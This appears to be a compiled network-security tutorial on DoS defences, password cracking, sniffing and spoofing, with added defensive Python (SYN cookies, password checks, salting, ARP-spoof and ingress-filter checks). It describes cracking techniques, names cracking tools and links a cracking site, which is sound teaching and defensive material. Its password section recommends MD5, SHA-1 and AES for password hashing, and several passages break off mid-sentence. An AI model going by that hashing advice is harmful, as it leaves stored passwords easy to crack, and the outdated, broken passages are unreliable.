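As an added illustration of the idea just described (this is not the Linux or Solaris code; the field layout, tick size and secret are assumptions), the following Python models a stateless listener: the SYN-ACK's initial sequence number is a keyed cookie, and the server allocates a connection record only when the client's ACK proves it received that cookie at its claimed address.

```python
import hashlib
import hmac
import secrets
import time

# Hypothetical server secret (a real kernel rotates it periodically).
SECRET = secrets.token_bytes(32)

# Small MSS table so the client's MSS fits in a 3-bit index (classic layout).
MSS_TABLE = (536, 1300, 1440, 1460)
TICK_SECONDS = 64                 # one step of the 5-bit time counter
COOKIE_MAC_MASK = (1 << 24) - 1   # low 24 bits carry the keyed MAC


def _tick(now):
    """5-bit time counter: 64-second slots, wrapping every 32 slots."""
    return (int(now) // TICK_SECONDS) & 0x1F


def _cookie_mac(src_ip, dst_ip, src_port, dst_port, tick, secret):
    """24-bit keyed MAC binding the cookie to the 4-tuple and the time slot."""
    msg = f"{src_ip}|{dst_ip}|{src_port}|{dst_port}|{tick}".encode()
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big") & COOKIE_MAC_MASK


def make_syn_cookie(src_ip, dst_ip, src_port, dst_port, client_mss,
                    now=None, secret=SECRET):
    """Build the 32-bit ISN: [5-bit tick][3-bit MSS index][24-bit MAC]."""
    tick = _tick(time.time() if now is None else now)
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss),
                  default=0)
    mac = _cookie_mac(src_ip, dst_ip, src_port, dst_port, tick, secret)
    return (tick << 27) | (mss_idx << 24) | mac


def check_syn_cookie(src_ip, dst_ip, src_port, dst_port, ack_number,
                     now=None, secret=SECRET):
    """Return the encoded MSS if ack_number-1 is a fresh, valid cookie for
    this 4-tuple; None otherwise. No state was needed to do this check."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    tick = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    # Accept only the current or the immediately preceding time slot.
    age = (_tick(time.time() if now is None else now) - tick) & 0x1F
    if age > 1:
        return None
    expected = _cookie_mac(src_ip, dst_ip, src_port, dst_port, tick, secret)
    got = cookie & COOKIE_MAC_MASK
    if not hmac.compare_digest(expected.to_bytes(3, "big"),
                               got.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]


class StatelessListener:
    """Server side: nothing is stored per SYN; a connection record exists
    only after an ACK carrying a valid cookie arrives."""

    def __init__(self, ip, port, secret=SECRET):
        self.ip, self.port, self.secret = ip, port, secret
        self.connections = {}   # (client_ip, client_port) -> negotiated MSS

    def on_syn(self, client_ip, client_port, client_mss, now=None):
        """Answer a SYN with the ISN for the SYN-ACK; allocate nothing."""
        return make_syn_cookie(client_ip, self.ip, client_port, self.port,
                               client_mss, now, self.secret)

    def on_ack(self, client_ip, client_port, ack_number, now=None):
        """Allocate state only if the ACK proves the cookie reached the
        claimed source address."""
        mss = check_syn_cookie(client_ip, self.ip, client_port, self.port,
                               ack_number, now, self.secret)
        if mss is None:
            return False
        self.connections[(client_ip, client_port)] = mss
        return True
```

A spoofed-source SYN flood therefore costs the server one HMAC per SYN and no memory, while a genuine client completes the handshake within the two-slot window.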

Firewalls

Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. DoS attacks are too complex for today's firewalls. For example, if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy: your router may be affected even before the firewall gets the traffic.

Modern stateful firewalls like Check Point FW1 NGX and Cisco PIX have a built-in capability to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender", as it confirms TCP connections are valid before proxying TCP packets to service networks (including border routers).

Switches

Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN link failover and balancing.

These schemes will work as long as the DoS attacks are something that can be prevented using them. For example, a SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content-based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using bogon filtering. Automatic rate filtering can work as long as you have set rate thresholds correctly and granularly. WAN link failover will work as long as both links have a DoS/DDoS prevention mechanism.

Routers

Similar to switches, routers have some rate-limiting and ACL capability. They too are manually set. Most routers can be easily overwhelmed under a DoS attack. If you add rules to take flow statistics out of the router during the DoS attack, they further slow down and complicate the matter. Cisco IOS has features that prevent flooding, i.e. example settings

Application front end hardware

Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management. Look for granularity of bandwidth management, hardware acceleration, and automation when selecting an appliance.

IPS based prevention

Intrusion-prevention systems are effective if the attacks have signatures associated with them. However, the trend among attacks is to have legitimate content but bad intent. IPS systems which work on content recognition cannot block behavior-based DoS attacks. An ASIC-based IPS can detect and block denial of service attacks because it has the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way.

A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern to determine whether there is a traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.

Passwords

Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to log in. To preserve the confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or a cryptographic hash) does not incorporate a secret key other than the password, we will refer to the one-way function employed as a hash and its output as a hashed password.

Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly, and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered.

The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords. Password cracking requires that an attacker can gain access to a hashed password, either by reading the password verification database (e.g., via a Trojan horse, virus program, or social engineering) or by intercepting a hashed password sent over an open network, or has some other way to rapidly and without limit test whether a guessed password is correct.

Without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However, well-designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded. With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances of cracking at least one are quite high.

There are also many other ways of obtaining passwords illicitly, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attacks, acoustic cryptanalysis, identity management system attacks and compromising host security (see password for details). However, cracking usually designates a guessing attack.

Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zero-knowledge password proof.

Principal attack methods

Weak encryption

If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick operation, and can be conducted while not connected to the target system. Any 'cracking' technique of this kind is considered successful if it can decrypt the password in fewer operations than would be required by a brute force attack (see below). The fewer operations required, the "weaker" the encryption is considered to be (for equivalently well-chosen passwords). One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. The LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Progress in cryptography has made available functions which are believed to actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to invert in practice. When quality implementations of good cryptographic hash functions are correctly used for authentication, password cracking through decryption can be considered infeasible.

Guessing

Not surprisingly, many users choose weak passwords, usually ones related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

• blank (none)

• the words "password", "passcode", "admin" and their derivatives

• the user's name or login name

• the name of their significant other or another relative

• their birthplace or date of birth

• a pet's name

• an automobile licence plate number

• a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters

• a row of letters from a standard keyboard layout (e.g., on the qwerty keyboard: qwerty itself, asdf, or qwertyuiop) and so on

Some users even neglect to change the default password that came with their account on the computer system, and some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account.

The determined cracker can easily develop a computer program that accepts personal information about the user being attacked and generates common variations for passwords suggested by that information.

Dictionary attack

A dictionary attack also exploits the tendency of people to choose weak passwords, and is related to the previous attack. Password cracking programs usually come equipped with "dictionaries", or word lists, with thousands or even millions of entries of several kinds, including:

• words in various languages

• names of people

• places

• commonly used passwords

The cracking program encrypts each word in the dictionary, and simple modifications of each word, and checks whether any match an encrypted password. This is feasible because the attack can be automated and, on inexpensive modern computers, several thousand possibilities can be tried per second.

Guessing, combined with dictionary attacks, has been repeatedly and consistently demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all account passwords on production systems.
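As an added example written from the defender's side (not part of the original text), the following policy check rejects the kinds of choices listed under Guessing and the dictionary entries above, after undoing the "simple modifications" users apply (case, leet substitutions, appended or prepended digits, reversal). The word list, keyboard rows and sample names are constructed here.

```python
import re

# Constructed mini word list standing in for the "dictionaries" crackers ship with.
COMMON_WORDS = {"password", "passcode", "admin", "letmein", "welcome",
                "dragon", "monkey", "football", "london", "paris"}

# Qwerty rows; a run of 4+ adjacent keys, in either direction, is flagged.
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")

# Common leet substitutions, undone before comparing with the word list.
LEET = str.maketrans("0134@$!", "oleaasi")


def _stems(text):
    """Cheap inverse of the usual modifications: lower-case, de-leet,
    strip leading/trailing digits and punctuation, and reverse."""
    base = text.lower()
    forms = {base, base.translate(LEET)}
    forms |= {re.sub(r"^[\d\W_]+|[\d\W_]+$", "", f) for f in list(forms)}
    forms |= {f[::-1] for f in list(forms)}
    return {f for f in forms if f}


def _keyboard_run(password):
    """Return the first 4-key keyboard-row run found in password, else None."""
    p = password.lower()
    for row in KEYBOARD_ROWS:
        for seq in (row, row[::-1]):
            for i in range(len(seq) - 3):
                if seq[i:i + 4] in p:
                    return seq[i:i + 4]
    return None


def weak_password_reasons(password, username, personal_terms=(),
                          wordlist=COMMON_WORDS):
    """List the reasons a candidate password would fall to guessing or a
    dictionary attack; an empty list means none of these checks fired."""
    if not password:
        return ["blank password"]
    reasons = []
    stems = _stems(password)
    if username and _stems(username) & stems:
        reasons.append("derived from the login name")
    for term in personal_terms:          # relatives, pets, birthplace, DOB, plate
        t = re.sub(r"[\W_]", "", str(term)).lower()
        if len(t) >= 3 and any(t in s or s in t for s in stems if len(s) >= 3):
            reasons.append(f"derived from personal information ({term})")
    hits = sorted(stems & set(wordlist))
    if hits:
        reasons.append(f"dictionary word or common password ({', '.join(hits)})")
    run = _keyboard_run(password)
    if run:
        reasons.append(f"keyboard-row pattern ({run})")
    return reasons
```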

Brute force attack

A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But how small is too small? A common current length recommendation is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc.) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices.

Generic brute-force search techniques can be used to speed up the computation. But the real threat is likely to come from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8-character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note: this number is very far below what is generally considered to be safe for an encryption key.

How small is too small thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose.

The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all three attacks and the spectrum of attacks encompassed by them.

Precomputation

In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the <plaintext, ciphertext> pairs in a way that enables lookup on the ciphertext field. This way, when a new encrypted password is obtained, password recovery is instantaneous. Precomputation can be very useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries.

Advanced precomputation methods exist that are even more effective. By applying a time-memory tradeoff, a middle ground can be reached: a search space of size N can be turned into an encrypted database of size O(N^(2/3)) in which searching for an encrypted password takes time O(N^(2/3)). The theory has recently been refined into a practical technique, and the online implementation at http://passcracking.com/ achieves impressive results on 8-character alphanumeric MD5 hashes. Another example [1] cracks alphanumeric Windows LAN Manager passwords in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Current Windows systems still compute and store a LAN Manager hash by default for backwards compatibility. [2]

A technique similar to precomputation, known generically as memoization, can be used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list search algorithm. The two approaches may of course be combined: the time-space tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter time than cracking them one after the other.

Salting

The benefits of precomputation and memoization can be nullified by randomizing the hashing process. This is known as salting. When the user sets a password, a short random string called the salt is suffixed to the password before encrypting it; the salt is stored along with the encrypted password so that it can be used during verification. Since the salt is usually different for each user, the attacker can no longer construct tables with a single encrypted version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could still build tables with common passwords encrypted with all 4096 possible 12-bit salts. However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the attacker must repeat the encryption of every guess for each user.

Early Unix password vulnerability

Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities, and limited passwords to 8 characters. While 12 bits was good enough for most purposes in the 1970s (although some expressed doubts even then), by 2005 disk storage had become cheap enough that an attacker can precompute encryptions of millions of common passwords, including all 4096 possible salt variations for each password, and store the precomputed values on a single portable hard drive. An attacker with a larger budget can build a disk farm with all 6-character passwords and the most common 7- and 8-character passwords stored in encrypted form, for all 4096 possible salts. And when several thousand passwords are being cracked at once, memoization still offers some benefit. Since there is little downside to using a longer (say 32-, 64- or 128-bit) salt, and such salts render any precomputation or memoization hopeless, modern implementations choose to do so.

Prevention

The best method of preventing password cracking is to ensure that attackers cannot get access even to the encrypted password. For example, on the Unix operating system, encrypted passwords were originally stored in a publicly accessible file, "/etc/passwd". On modern Unix (and similar) systems, on the other hand, they are stored in the file "/etc/shadow", which is accessible only to programs running with enhanced privileges (i.e., 'system' privileges). This makes it harder for a malicious user to obtain the encrypted passwords in the first instance. Unfortunately, many common network protocols transmit the hashed passwords to allow remote authentication.

Even if the attacker has no access to the password database itself, every attacker should also be prevented from being able to use the system itself to check a large number of passwords in a relatively small amount of time. For this reason, many systems include a significant forced delay (a few seconds is generally sufficient) between the entry of the password and returning a result. Also, it is a good policy to (temporarily) lock out an account that has been subjected to 'too many' incorrect password guesses, although this could be exploited to launch a denial of service attack. "Too many" in this context is frequently taken to be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed attempts in an hour.

It is also imperative to choose good passwords (see password for more information) and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and MD5 are common choices. Good implementations, including adequate salt, are also required. Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts of computer time so as to slow down the rate at which an attacker can test guesses, even if the hashed password is available. This process is known as key strengthening.
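The following Python is an added example covering the Precomputation, Salting and Early Unix sections above together with the PBKDF2 sentence; it is not the original author's code. It uses SHA-256 with the salt suffixed (the text's description) rather than the historical Unix crypt, a constructed five-word "dictionary", and the standard-library hashlib.pbkdf2_hmac for key strengthening.

```python
import hashlib
import hmac
import os

# Constructed candidate list standing in for a cracker's dictionary.
CANDIDATES = ["password", "letmein", "qwerty", "dragon", "hunter2"]


def hash_with_salt(password, salt):
    """Hash of password with the salt suffixed (salt=b"" means unsalted)."""
    return hashlib.sha256(password.encode() + salt).digest()


def table_entries(n_candidates, salt_bits):
    """Entries a full precomputed table needs: every candidate under every
    possible salt. 12 bits multiplies the work by 4096; 32 bits by 2**32."""
    return n_candidates * (1 << salt_bits)


def precomputed_table(candidates, salt_bits):
    """Build the <ciphertext -> plaintext> table for a small salt space.
    Only feasible while table_entries() stays small."""
    table = {}
    nbytes = (salt_bits + 7) // 8
    for pw in candidates:
        for s in range(1 << salt_bits):
            salt = s.to_bytes(nbytes, "big") if salt_bits else b""
            table[hash_with_salt(pw, salt)] = pw
    return table


def lookup(table, stored_hash):
    """Instant recovery if the stored hash was precomputed, else None."""
    return table.get(stored_hash)


def store_pbkdf2(password, iterations=200_000):
    """Key strengthening: a 128-bit random salt and an expensive KDF, so each
    guess costs the attacker `iterations` HMAC evaluations per user."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": dk}


def verify_pbkdf2(password, record):
    """Recompute with the stored salt and compare in constant time."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["hash"])
```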

However, no amount of effort put into preventing password cracking can be sufficient without a well-designed and well-implemented security policy. The canonical and all too common example of this is the user who leaves their password on a Post-It note stuck to their monitor or under their keyboard. Even sophisticated users who have been warned repeatedly are known to have such lapses.

Password cracking programs

• Ophcrack - Open source

Ophcrack is an open source (GPL licensed) program that cracks Windows LM hashes using rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. There is also a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Starting with version 2.3, Ophcrack also cracks NT hashes.

• Crack

Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack.

Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of Wales Aberystwyth, was trying to improve Dan Farmer's 'pwc' cracker in COPS and found that by re-engineering its memory management he got a noticeable performance increase. This led to a total rewrite which became "Crack v2.0" and further development to improve usability.

• Cain

Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing and cracking various password hashes by means of dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain. Cain and Abel is maintained by Massimiliano Montoro.

• John the Ripper

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 flavors of Unix, counting each flavor only once for all the architectures it supports, plus DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and the Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.

John the Ripper is a perfectly safe program to install and run on your computer. If you are running a multi-user system, you should make sure you are shadowing your password file so that the hashes are not visible; however, even if you are not, not installing John will not prevent a malicious user from running John on their own computer with your hashes.

• LC5 (formerly L0phtCrack)

L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions because of its price and low availability.

The application was produced by @stake after the L0pht merged with @stake in 2000. @stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to new customers, citing US Government export regulations, and has announced that they will discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other unofficial mirrors.

• RainbowCrack

RainbowCrack is the name of a computer program which performs password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large precomputed files called rainbow tables to drastically reduce the length of time needed to crack a password.

RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.

Sniffers: Basics and Detection

“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Introduction

A sniffer is a program or a device that eavesdrops on network traffic by grabbing information traveling over a network. Sniffers are basically "data interception" technology. They work because Ethernet was built around a principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected to a hub. This article seeks to explore the topic of sniffers, how they work, and detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.

How A Sniffer Works

A computer connected to a LAN has two addresses. One is the MAC (Media Access Control) address, which uniquely identifies each node on a network and is stored on the network card itself. It is the MAC address that the Ethernet protocol uses when building "frames" to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer puts the MAC address of the destination machine, rather than its IP address, into the Ethernet header. Mapping an IP address to the MAC address required by the data link protocol is the job of the Address Resolution Protocol (ARP). The sending host first looks up the destination's MAC address in a table, usually called the ARP cache. If no entry is found for the IP address, ARP broadcasts a request packet (an ARP request) to all machines on the network. The machine with that IP address responds to the source machine with its MAC address, which is then added to the source machine's ARP cache and used for all further communication with the destination.
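The ARP exchange just described, as an added example that is not part of the original article: the Ethernet and ARP layouts are decoded with Python's struct module, and a small ARP cache records the IP-to-MAC bindings it sees. The cache also performs the check anyone hunting for sniffers wants: it flags a reply that re-binds an already cached IP address to a different MAC, which is the signature of the ARP spoofing used to sniff on switched networks. The host names (Venus, Mars, Pluto), the MAC and IP addresses and the frames themselves are constructed for the example.

```python
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_frame(op: int, sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Build an Ethernet II frame carrying an Ethernet/IPv4 ARP packet.

    Used here only to fabricate sample traffic; a sniffer reads the same
    bytes off the wire. Requests go to the broadcast MAC, replies to the asker.
    """
    eth_dst = BROADCAST_MAC if op == ARP_REQUEST else target_mac
    eth = struct.pack("!6s6sH", mac_to_bytes(eth_dst), mac_to_bytes(sender_mac), ETHERTYPE_ARP)
    # ARP header: hardware type 1 (Ethernet), protocol 0x0800 (IPv4),
    # hardware length 6, protocol length 4, opcode, then the four addresses.
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += struct.pack("!6s4s6s4s", mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip))
    return eth + arp


def parse_frame(frame: bytes) -> Optional[dict]:
    """Decode the Ethernet header and, for ARP payloads, the ARP fields.

    Returns None for frames of any other EtherType so a caller can skip them.
    """
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    payload = frame[14:]
    if len(payload) < 28:
        raise ValueError("truncated ARP packet")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", payload[8:28])
    return {
        "eth_dst": bytes_to_mac(dst), "eth_src": bytes_to_mac(src), "op": op,
        "sender_mac": bytes_to_mac(sha), "sender_ip": bytes_to_ip(spa),
        "target_mac": bytes_to_mac(tha), "target_ip": bytes_to_ip(tpa),
    }


class ArpCache:
    """A host's IP -> MAC table, plus the check a passive monitor adds on top:
    alert when a reply re-binds an IP that is already cached to a new MAC."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> None:
        arp = parse_frame(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return  # only replies are learned from in this simplified model
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append(f"{ip} moved from {known} to {mac} (possible ARP spoofing)")
        self.table[ip] = mac  # a real stack overwrites too, which is why the attack works


# Constructed sample traffic: Venus asks who has 10.0.0.2, Mars answers, then a
# third NIC sends an unsolicited reply claiming Mars's address for itself.
VENUS = ("aa:aa:aa:aa:aa:01", "10.0.0.1")
MARS = ("aa:aa:aa:aa:aa:02", "10.0.0.2")
PLUTO = ("de:ad:be:ef:00:99", "10.0.0.99")

SAMPLE_FRAMES = [
    build_arp_frame(ARP_REQUEST, VENUS[0], VENUS[1], ZERO_MAC, MARS[1]),
    build_arp_frame(ARP_REPLY, MARS[0], MARS[1], VENUS[0], VENUS[1]),
    build_arp_frame(ARP_REPLY, PLUTO[0], MARS[1], VENUS[0], VENUS[1]),
]


def run_sample() -> ArpCache:
    cache = ArpCache()
    for frame in SAMPLE_FRAMES:
        cache.observe(frame)
    return cache


if __name__ == "__main__":
    result = run_sample()
    print("ARP cache:", result.table)
    for alert in result.alerts:
        print("ALERT:", alert)
```

The third frame is exactly what an attacker on a switched segment sends to pull Venus's traffic for Mars through their own NIC; the cache accepts the new binding, as a real host would, but the monitor records the change so it can be investigated.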

There are two basic types of Ethernet environments, and how sniffers work in each is slightly different.

Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus

Well-known packet sniffers

• AiroPeek

• dSniff

• Ethereal

• EtherPeek

• Ettercap

• Kismet

• Javvin Packet Analyzer

• NetStumbler

• Network General Sniffer

• Network Instruments Observer

• OmniPeek

• PRTG

• snoop (Solaris)

• tcpdump

• Wireshark (formerly known as Ethereal)

• WPE (Winsock packet editor)

Spoofing attack

In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gains an illegitimate advantage.

Man-in-the-middle attack and Internet protocol spoofing

An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing he is Bob, and spoofs Bob into believing he is Alice, thus gaining access to all messages in both directions without any cryptanalytic effort.

For IP spoofing against a TCP connection, the attacker must monitor the packets sent from Alice to Bob and then guess the sequence numbers of the packets. The attacker then knocks Alice off the network with a SYN flood and injects his own packets, claiming to have Alice's address. Alice's firewall can defend against some spoofing attacks when it has been configured with knowledge of the IP address ranges connected to each of its interfaces: it can then drop a packet as spoofed if it arrives on an interface that is not known to be connected to the packet's source address.

Many carelessly designed protocols are subject to spoofing attacks, including many of those used on the Internet.
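The interface-aware firewall check in the previous paragraph is what RFC 2827 (BCP 38) calls ingress filtering, and what routers implement as unicast reverse-path forwarding. Here it is as an added Python example, not part of the original article: the firewall keeps a table of which source prefixes legitimately sit behind each interface and drops any packet whose source address should have arrived somewhere else. The interface names, prefixes and sample packets are constructed for the example.

```python
import ipaddress
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed interface table for the firewall in front of Alice: the source
# prefixes that legitimately arrive through each interface.
INTERFACE_PREFIXES: Dict[str, List[str]] = {
    "eth0": ["192.168.10.0/24"],   # Alice's LAN
    "eth1": ["10.20.0.0/16"],      # a partner network reached over a private link
    "wan0": ["0.0.0.0/0"],         # everything else comes in from the Internet
}


def expected_interface(src_ip: str, table: Dict[str, List[str]]) -> Optional[str]:
    """Longest-prefix match: the interface traffic *from* src_ip should enter on."""
    addr = ipaddress.ip_address(src_ip)
    best_iface, best_len = None, -1
    for iface, prefixes in table.items():
        for prefix in prefixes:
            net = ipaddress.ip_network(prefix)
            if addr in net and net.prefixlen > best_len:
                best_iface, best_len = iface, net.prefixlen
    return best_iface


def is_spoofed(src_ip: str, arrived_on: str,
               table: Dict[str, List[str]] = INTERFACE_PREFIXES) -> bool:
    """The check described in the text: the packet is spoofed if its source
    address belongs to a prefix that sits behind some *other* interface."""
    expected = expected_interface(src_ip, table)
    return expected is None or expected != arrived_on


def filter_packets(packets: Iterable[Tuple[str, str]],
                   table: Dict[str, List[str]] = INTERFACE_PREFIXES):
    """Split (src_ip, ingress_interface) pairs into (accepted, dropped)."""
    accepted: List[Tuple[str, str]] = []
    dropped: List[Tuple[str, str]] = []
    for src_ip, iface in packets:
        (dropped if is_spoofed(src_ip, iface, table) else accepted).append((src_ip, iface))
    return accepted, dropped


# Constructed sample: the third packet carries Alice's own LAN address but
# enters from the Internet side, which is what an attacker impersonating
# Alice from outside would produce; the fifth claims the partner network
# from the LAN port.
SAMPLE_PACKETS = [
    ("192.168.10.5", "eth0"),
    ("203.0.113.7", "wan0"),
    ("192.168.10.5", "wan0"),
    ("10.20.3.4", "eth1"),
    ("10.20.3.4", "eth0"),
]

if __name__ == "__main__":
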